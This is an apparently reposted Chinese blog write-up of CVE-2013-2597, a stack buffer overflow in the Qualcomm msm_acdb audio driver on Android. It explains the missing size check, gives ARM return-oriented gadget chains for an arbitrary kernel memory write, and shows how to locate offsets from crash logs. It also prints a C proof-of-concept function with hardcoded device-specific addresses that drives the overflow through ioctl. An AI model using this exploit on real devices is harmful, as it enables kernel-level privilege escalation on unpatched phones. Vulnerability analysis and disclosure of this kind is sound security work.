/*

本文章由 莫灰灰 编写,转载请注明出处。

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

1. 漏洞描写叙述

音频驱动acdb提供了一个ioctl的系统接口让应用层调用,然而,其在处理传进来的參数时没有做有效的边界检查。应用程序能够通过/dev/msm_acdb设备文件就能达到提升权限的目的。

2. 漏洞分析

原始代码例如以下
if (size <= 0) {

	pr_err("%s: Invalid size sent to driver: %d\n",

		__func__, size);

	result = -EFAULT;

	goto done;

}

if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {

	pr_err("%s: fail to copy table size %d\n", __func__, size);

	result = -EFAULT;

	goto done;

}
acdb驱动在处理ioctl的时候,仅仅对输入的參数大小做了size<=0的推断,而没有做>的推断,紧接着,copy_from_user(data, (void *)(arg + sizeof(size)), size)的调用造成局部变量data的栈溢出。






3. 漏洞利用
1.原来的流程 - do_vfs_ioctl调用acdb_ioctl后返回



do_vfs_ioctl:

STMPW [SP], { R4-R9, LR }

...

BL acdb_ioctl

...

ADD SP, SP, #$44 // (2)

LDMUW [SP], { R4-R9, PC } // (1)



2.acdb_ioctl当中一段,能够获得控制PC的机会。改动寄存器的位置是 (3),这里能够操作R4-PC的全部数值了


acdb_ioctl:

...

ADD SP, SP, #$84

LDMUW [SP], { R4-R11, PC } // (3)


通过栈溢出,改动R5,R9,PC的值。


3.上面的指令,通过堆栈溢出,控制PC的值,跳转到以下代码运行


STR R5, [R9] // (4)

LDMUW [SP], { R4-R10, PC } // (5)


此处很关键,主要通过STR指令,将R5的值设置到R9的地址中,即通过栈溢出达到随意地址写的目的。



4.运行(5)之后,为了堆栈平衡,栈要填充 4*8 字节,然后设置下一跳的PC,即返回到(2)那里去


ADD SP, SP, #$24 // (6)

LDMUW [SP], { R4-R9, PC }


5.实际栈的位置和p->data的位置须要硬编码适配。
p->data[...]的値须要初始化的时候设置。
硬编码的地址请在pc上通过崩溃的日志分析。
p->data[i]=i 这样来试探(注:给数据标上相对偏移,方便通过栈来定位),这个样例中,PC在&p->data[0x9c]的位置。
例:
ACDB=> ACDB ioctl not found!

Unable to handle kernel paging request at virtual address 9f9e9d9c

pgd = df56c000

[9f9e9d9c] *pgd=00000000

Internal error: Oops: 80000005 [#1] PREEMPT SMP

Modules linked in:

CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)

PC is at 0x9f9e9d9c

LR is at acdb_ioctl+0x740/0x860


6.设置好堆栈布局

((unsigned int)&p->data[0x80]) = value;     //r5: PC - 4*7

((unsigned int)&p->data[0x90]) = address;   //r9: PC - 4*3

((unsigned int)&p->data[0x9c]) = (4)的地址; //pc: PC

((unsigned int)&p->data[0xbc]) = (6)地址;   //pc: PC + 4*8


4. PoC
static int

write_value(const acdb_param *param, unsigned long address, unsigned long value)

{

    const char *device_name = "/dev/msm_acdb";

    struct acdb_ioctl arg;

    int fd;

    int ret;

    int i;

    fd = open(device_name, O_RDONLY);

    if (fd < 0) {

      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));

      return -1;

    }

    arg.size = param->pc2.pos + 4;

    for (i = 0; i < arg.size; i += 4) {

      *(unsigned long int *)&arg.data[i] = i;

    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre">	</span>

    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5

    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; //

    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //

    ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl,造成堆栈溢出,使得随意地址写入漏洞的触发

    close(fd);

    return 0;

}




当中,param的值相应例如以下:


{ DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },




5.漏洞修复


添加了对size上限的控制








參考文章:


http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html



https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597



https://gist.github.com/fi01/5857693









												


											
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)的更多相关文章
	

    
								
  1. BUFFER OVERFLOW 10 Vulnerability & Exploit Example
		
    SRC= http://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html THE VULNERABLE AND THE EXPLOIT     W ...
    
		
    2. 
						
  2. CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android. Buffer Overflow Vulnerability reported by #plzdonthackme, Soctt.
		
    CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android.Buffer Overflow Vu ...
    
		
    3. 
						
  3. buffer overflow
		
    Computer Systems A Programmer's Perspective Second Edition We have seen that C does not perform any  ...
    
		
    4. 
						
  4. buffer overflow vulnerabilitie
		
    Computer Systems A Programmer's Perspective Second Edition Avoiding security holes.For many years,bu ...
    
		
    5. 
						
  5. ORA-20000: ORU-10027: buffer overflow, limit of 10000 bytes
		
        要用dbms_output.put_line来输出语句,遇到以下错误: ERROR 位于第 1 行: ORA-20000: ORU-10027: buffer overflow, limit  ...
    
		
    6. 
						
  6. CVE-2016-10190 FFmpeg Http协议 heap buffer overflow漏洞分析及利用
		
    作者:栈长@蚂蚁金服巴斯光年安全实验室 -------- 1. 背景 FFmpeg是一个著名的处理音视频的开源项目,非常多的播放器.转码器以及视频网站都用到了FFmpeg作为内核或者是处理流媒体的工具 ...
    
		
    7. 
						
  7. 缓存溢出Buffer Overflow
		
    缓存溢出(Buffer overflow),是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址.在某些情况下,这些过量的字符能够作为“可执行”代码来运 ...
    
		
    8. 
						
  8. (原创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)
		
    堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的.了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例. 堆栈     堆 栈是 ...
    
		
    9. 
						
  9. Writing buffer overflow exploits - a tutorial for beginners
		
    Buffer overflows in user input dependent buffers have become one of the biggest security hazards on  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Just learn how to use the JNI
			
    JNITestProject Just learn how to use the JNI Refer : 1. ant usage http://lmbj.net/blog/ant-build-and ...
    
			
    2. 
						
  2. 在RHEL上安装Thrift(支持C++)的若干问题 » 编码无悔 / Intent & Focused
			
    在RHEL上安装Thrift(支持C++)的若干问题 » 编码无悔 / Intent & Focused [原创]在RHEL上安装Thrift(支持C++)的若干问题    2010年12月1 ...
    
			
    3. 
						
  3. 使用EXCEL设置“下拉菜单”选项功能
			
    原创作品.出自 "深蓝的blog" 博客.欢迎转载.转载时请务必注明出处,否则有权追究版权法律责任. 深蓝的blog:http://blog.csdn.net/huangyanlo ...
    
			
    4. 
						
  4. webapi Task
			
    webapi+Task并行请求不同接口实例 标题的名称定义不知道是否准确,不过我想表达的意思就是使用Task特性来同时请求多个不同的接口,然后合并数据:我想这种场景的开发对于对接过其他公司接口的人不会 ...
    
			
    5. 
						
  5. Git——git 上传时 遗漏文件解决办法
			
    今天在Server上建立一个git 库,把本地的code 上传到Server,再次clone下来时,发现少了些文件.原来git 工具不上上传一些二进制,pdf,.patch等一些文件.在上传时,git ...
    
			
    6. 
						
  6. UVA 11768 - Lattice Point or Not(数论)
			
    UVA 11768 - Lattice Point or Not option=com_onlinejudge&Itemid=8&page=show_problem&categ ...
    
			
    7. 
						
  7. 网络安全审查制度即将推出 手机App安全加密成必定趋势
			
    年05月22日宣布,为维护国家网络安全.保障中国用户合法利益,中国即将推出网络安全审查制度,关系国家安全和公共利益的系统使用的.重要信息技术产品和服务,应通过网络安全审查.文章出处:*** 网络安全审 ...
    
			
    8. 
						
  8. HDU 4790 Just Random 数学
			
    链接:pid=4790">http://acm.hdu.edu.cn/showproblem.php?pid=4790 意:从[a.b]中随机找出一个数字x,从[c.d]中随机找出一个 ...
    
			
    9. 
						
  9. 推荐一套.NET文档处理组件Spire.Office
			
    原文:推荐一套.NET文档处理组件Spire.Office 以前的项目中用到一点Word简单处理的功能(文字替换和转PDF格式),当时使用的是一套COM组件,必须在服务器上安装office环境.最近考 ...
    
			
    10. 
						
  10. 初识Mongodb之[CURD]-PHP版
			
    行动 在了实践之前,希望大家看一下上面的学习资源,了解一下基本操作. 数据连接初始账号password 账号:admin password:admin 首先我们建立一个文件:mongodb.php,设 ...
    
			
    11.